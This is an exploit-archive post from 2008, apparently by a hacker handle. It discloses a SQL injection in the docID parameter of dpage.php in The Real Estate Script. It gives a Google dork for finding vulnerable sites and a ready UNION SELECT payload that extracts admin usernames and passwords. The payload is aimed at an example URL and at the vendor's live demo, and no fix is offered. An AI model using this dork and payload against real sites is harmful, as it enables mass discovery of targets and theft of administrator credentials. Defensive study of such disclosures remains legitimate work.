The Real Estate Script (dpage.php docID) SQL Injection Vulnerability

2008-05-13 00:00:00

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########## Remote SQL Injection Vulnerability ##############
Therealestatescript [ dpage.php ]
#################################################

[$] Author : HaCkeR_EgY

[$] c0nTaCT : [email protected]

[$] DownlOad : www.therealestatescript.com

[$] Price : The Real Estate Script is on sale for $99.95 $59.95 until June 1st.
====================================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[$] Dork : inurl:dpage.php?docID

[$] ExPLo!T : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin

[$] L!ve Demo : http://www.therealestatescript.com/demo/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin

--Note-- : Enjoy !!! ............. (:

====================================================

[$] Thanx : MY Brotha and MY Master " Abo Mohamed "

[$] Greetz : F!resell , Mohamed el Arab ,Mr.SQL , DaRk MaStEr , H-T Team ,Gold_M , Stack-Terrorist , Jiki Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.